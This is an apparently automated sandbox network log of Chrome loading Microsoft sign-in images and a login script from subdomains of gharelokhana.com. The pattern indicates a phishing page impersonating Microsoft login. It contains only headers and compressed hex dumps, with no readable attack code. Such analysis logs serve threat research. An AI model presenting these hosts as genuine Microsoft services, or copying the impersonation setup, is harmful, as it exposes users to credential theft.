                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:55 UTC800INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:54 GMT
                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:46 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F47E260FD
                                                                                                                                                                                                x-ms-request-id: 8f25bc91-001e-0057-738c-4652c8000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072454Z-15d6f6465c8r6bl7hC1DUSwb3w00000001hg000000009zqq
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:55 UTC680INData Raw: 32 61 31 0d 0a 1f 8b 08 00 00 00 00 00 00 ff b5 55 db 6e db 30 0c fd 15 c1 7d 69 1e ac 50 b2 ae 43 1c a0 37 6c 2f c3 0a 64 fd 80 d4 b1 13 03 ae 1d d8 6e d3 f6 eb 47 ca f6 96 0c 79 6c 10 20 e6 91 45 f2 f0 98 94 16 dd db 96 bd bf 54 75 97 46 bb be df 7f 9b cf 0f 87 03 3f 24 bc 69 b7 73 09 00 73 dc 11 b1 43 b9 e9 77 69 24 bc 84 88 ed f2 72 bb eb 11 81 43 54 94 55 95 46 75 53 e7 d1 72 b1 65 cd 7e 9d 95 fd 47 1a 71 19 b1 ac 2a f7 f1 7e 4d ae af 6d 75 7d f5 30 c3 3d 84 d9 26 8d 7e 0a 65 0c 57 4c 58 af b9 cc bc 06 9e 58 06 88 25 70 17 1b 69 b9 96 13 12 0a 04 37 2b a9 84 e1 d6 c6 02 c0 b1 c1 3f d8 b1 d4 0a cd c4 01 57 4e 0e 88 25 3e e1 a6 b3 16 d7 24 ed a6 08 63 bc 11 7d 4e f4 03 bb 9b 59 34 3f a2 97 78 c5 31 bf 13 9a 9b cc 2a c3 b5 23 76 89 16 c8 47 61 6c 39 01
                                                                                                                                                                                                Data Ascii: 2a1Un0}iPC7l/dnGyl ETuF?$issCwi$rCTUFuSre~Gq*~Mmu}0=&~eWLXX%pi7+?WN%>$c}NY4?x1*#vGal9
                                                                                                                                                                                                2024-12-05 07:24:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                31192.168.2.849793164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:54 UTC805OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:55 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:54 GMT
                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F4911527F
                                                                                                                                                                                                x-ms-request-id: 4bc049a9-a01e-0003-5c9b-461d9f000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072454Z-15d6f6465c8fl8rshC1DUS58g8000000013000000000bvqv
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:55 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                                                                                                                                                                                Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
                                                                                                                                                                                                2024-12-05 07:24:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                32192.168.2.849794164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:54 UTC791OUTGET /shared/1.0/content/images/favicon_a_eupayfgghqiai7k9sol6lg2.ico HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                Sec-Fetch-Site: same-site
                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                Referer: https://djdjkdlellekkff.gharelokhana.com/
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:56 UTC758INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:56 GMT
                                                                                                                                                                                                Content-Type: image/x-icon
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Sun, 18 Oct 2020 03:02:03 GMT
                                                                                                                                                                                                etag: 0x8D8731230C851A6
                                                                                                                                                                                                x-ms-request-id: 455491e3-f01e-0050-7f8c-460106000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072455Z-15d6f6465c82tkq5hC1DUSr90w00000000y000000000947p
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                2024-12-05 07:24:56 UTC2286INData Raw: 38 65 37 0d 0a 00 00 01 00 06 00 10 10 00 00 00 00 20 00 16 01 00 00 66 00 00 00 18 18 00 00 00 00 20 00 24 01 00 00 7c 01 00 00 20 20 00 00 00 00 20 00 35 01 00 00 a0 02 00 00 30 30 00 00 00 00 20 00 6a 01 00 00 d5 03 00 00 40 40 00 00 00 00 20 00 f3 01 00 00 3f 05 00 00 80 80 00 00 00 00 20 00 b5 01 00 00 32 07 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 10 00 00 00 10 08 06 00 00 00 1f f3 ff 61 00 00 00 dd 49 44 41 54 78 9c dd 92 31 4e 43 41 10 43 df cc 8e 44 40 b0 22 2d 65 6e c4 21 90 68 c3 15 38 40 ce c4 39 68 a8 11 22 e4 ff 00 05 93 35 4d 1a b2 bf 89 68 10 2e 2d 8d c7 b6 6c 9b eb 85 4c fc 80 50 d6 59 09 5e 6c 75 77 ff c8 95 d9 72 dc 28 cd 08 0e e0 87 c7 c7 c2 7f 77 fe 17 04 42 28 7b da 12 04 f2 26 01 46 02 a9 89 be a2 ce 4e ba 66
                                                                                                                                                                                                Data Ascii: 8e7 f $| 500 j@@ ? 2PNGIHDRaIDATx1NCACD@"-en!h8@9h"5Mh.-lLPY^luwr(wB({&FNf
                                                                                                                                                                                                2024-12-05 07:24:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                33192.168.2.849798164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:54 UTC553OUTGET /shared/1.0/content/images/marching_ants_986f40b5a9dc7d39ef8396797f61b323.gif HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:56 UTC755INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:55 GMT
                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F4904824B
                                                                                                                                                                                                x-ms-request-id: aa2ece26-e01e-004f-52d0-448daf000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072455Z-15b54885d96tt466hC1FRAvn9s00000007b0000000001r2v
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                2024-12-05 07:24:56 UTC3627INData Raw: 65 32 34 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 00 00 00 69 69 69 21 f9 04 09 05 00 00 00 21 fe 26 45 64 69 74 65 64 20 77 69 74 68 20 65 7a 67 69 66 2e 63 6f 6d 20 6f 6e 6c 69 6e 65 20 47 49 46 20 6d 61 6b 65 72 00 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 39 84 1f 69 19 07 ec 96 8a b2 51 34 af de bc fb 0f 86 e2 48 96 e6 89 a6 6a 0a 3d 99 6b 39 2d 35 5f f5 8a e7 fa ce f7 fe 0f 8c b4 6a 37 98 a6 28 7b 05 97 cc a6 f3 09 d5 15 00 00 21 f9 04 09 03 00 00 00 2c 00 00 00 00 60 01 03 00
                                                                                                                                                                                                Data Ascii: e24GIF89a`iii!!&Edited with ezgif.com online GIF maker!NETSCAPE2.0,`6PlHI:qJk`BYL*&!,`9iQ4Hj=k9-5_j7({!,`
                                                                                                                                                                                                2024-12-05 07:24:56 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                34192.168.2.849799164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:54 UTC559OUTGET /shared/1.0/content/images/marching_ants_white_8257b0707cbe1d0bd2661b80068676fe.gif HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:55 UTC761INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:55 GMT
                                                                                                                                                                                                Content-Type: image/gif
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:47 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F48EC4154
                                                                                                                                                                                                x-ms-request-id: 6132c721-501e-0004-551a-434e51000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072455Z-15b54885d9625p44hC1FRA4gmn000000084g000000005m17
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                2024-12-05 07:24:55 UTC2679INData Raw: 61 37 30 0d 0a 47 49 46 38 39 61 60 01 03 00 f0 00 00 ff ff ff 96 96 96 21 ff 0b 4e 45 54 53 43 41 50 45 32 2e 30 03 01 00 00 00 21 f9 04 09 05 00 00 00 2c 00 00 00 00 60 01 03 00 00 02 36 84 1d a9 b7 07 ed 50 8a 6c d2 8b b3 de bc fb 0f 86 e2 48 96 e6 89 a2 0a 04 49 01 d6 3a 71 4a d7 f6 8d e7 fa ce 6b ab f5 00 ba 60 42 59 b1 87 4c 2a 97 cc 26 af 00 00 21 f9 04 09 05 00 00 00 2c 06 00 00 00 30 00 03 00 00 02 1a 8c 01 16 88 ca ec 1e 3c f2 a9 18 1b b5 5b e6 9a 5c 4b 38 6a e5 74 72 a9 67 14 00 21 f9 04 09 03 00 00 00 2c 07 00 00 00 33 00 03 00 00 02 1a 8c 81 16 c8 ca ef 5e 3b 12 2a 0a e2 5c 55 4b df 5d 5c 86 25 e5 56 99 63 aa 14 00 21 f9 04 09 05 00 00 00 2c 0a 00 00 00 37 00 03 00 00 02 1a 8c 81 60 91 b9 ed 0e 6c 6f c6 c5 ee ac 90 5b bf 61 19 02 2a 52 77 7e
                                                                                                                                                                                                Data Ascii: a70GIF89a`!NETSCAPE2.0!,`6PlHI:qJk`BYL*&!,0<[\K8jtrg!,3^;*\UK]\%Vc!,7`lo[a*Rw~
                                                                                                                                                                                                2024-12-05 07:24:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                35192.168.2.849800164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:54 UTC571OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pfetchsessionsprogress_d0a803279e7397bef834.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:55 UTC805INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:55 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 5538
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Thu, 15 Aug 2024 17:52:54 GMT
                                                                                                                                                                                                etag: 0x8DCBD531731891C
                                                                                                                                                                                                x-ms-request-id: 2dfc057d-801e-0059-2f8c-467b78000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072455Z-15d6f6465c8phdgbhC1DUSvz0n00000000r0000000000g9z
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:55 UTC5538INData Raw: 1f 8b 08 00 00 00 00 00 00 03 ad 5b 7d 77 9b 46 d6 ff 7f 3f 05 62 f7 28 b0 19 63 bb 69 9b 16 97 fa 38 7a 49 d4 da b1 6b c9 ed 66 93 1c 1d 24 46 12 31 02 ca 20 db aa a5 ef fe fc ee 0c 08 24 21 d9 e9 b3 3d a9 31 33 77 ee dc b9 73 df 2f 3e fc 77 ed 1f da bf b5 83 e7 ff a7 75 7b 67 d7 3d ed b2 ad f5 de 75 ae 9b da 15 de 3e 68 ef 2f 7b 9d 46 eb f9 78 68 53 fa bf 37 f1 85 36 f2 03 ae e1 39 70 05 f7 b4 28 d4 a2 44 f3 c3 61 94 c4 51 e2 a6 5c 68 53 fc 4c 7c 37 d0 46 49 34 d5 d2 09 d7 e2 24 fa c2 87 a9 d0 02 5f a4 58 34 e0 41 74 af 19 40 97 78 da 95 9b a4 73 ad 73 65 5a c0 cf 81 cd 1f fb 21 56 0f a3 78 8e df 27 a9 16 46 a9 3f e4 9a 1b 7a 12 5b 80 97 50 70 6d 16 7a 3c d1 ee 27 fe 70 a2 5d f8 c3 24 12 d1 28 d5 12 3e e4 fe 1d 36 11 33 8c af 6f c1 34 37 e1 9a e0 a9 36
                                                                                                                                                                                                Data Ascii: [}wF?b(ci8zIkf$F1 $!=13ws/>wu{g=u>h/{FxhS769p(DaQ\hSL|7FI4$_X4At@xsseZ!Vx'F?z[Ppmz<'p]$(>63o476


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                36192.168.2.849808164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:24:57 UTC554OUTGET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:24:57 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:24:57 GMT
                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:48 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F4911527F
                                                                                                                                                                                                x-ms-request-id: 0a21cfae-401e-0046-394b-46c87c000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072457Z-15b54885d96jbrdnhC1FRAfgvc00000002yg00000000382f
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 4554691
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:24:57 UTC1442INData Raw: 35 39 62 0d 0a 1f 8b 08 00 00 00 00 00 00 ff bd 57 4d 6f 1c 37 0c fd 2b 8b ed 75 56 96 48 4a a2 0a db 80 7b f2 c1 be fa 90 db b6 b1 b3 06 ec 26 88 17 76 fa ef fb 28 51 b3 46 91 a2 c9 a5 b0 f7 61 57 1c 51 fc 7c e2 9c bf bc 7e da 7c 7b 7e fa f3 e5 62 7b 38 1e bf fc 7a 76 f6 f6 f6 16 de 38 7c fe fa e9 8c 62 8c 67 78 62 bb 79 7b fc 78 3c 5c 6c 53 d4 ed e6 70 ff f8 e9 70 bc d8 92 6c 37 af 8f f7 6f bf 7d fe 76 b1 8d 9b b8 81 74 83 c5 cb f3 e3 e3 f1 e9 fe 72 ff f2 72 7f 7c 39 3f 1b bf ce bf ec 8f 87 cd c7 8b ed ad 48 50 2e 8b 84 72 97 34 c8 61 47 41 ee 6a c8 ca d7 82 af 37 ac 21 a5 b6 98 ec 9a 4b c8 9c 6e 98 42 12 5a fa 43 87 5d 88 d4 fa d6 6b 6a a1 dd 41 d1 81 83 70 b9 e1 1a 78 49 a6 fe 10 62 d6 1b 49 21 4b b6 93 3e 3c d3 92 42 94 b6 4f 81 8a 2e 03 23 fe d2 12
                                                                                                                                                                                                Data Ascii: 59bWMo7+uVHJ{&v(QFaWQ|~|{~b{8zv8|bgxby{x<\lSppl7o}vtrr|9?HP.r4aGAj7!KnBZC]kjApxIbI!K><BO.#
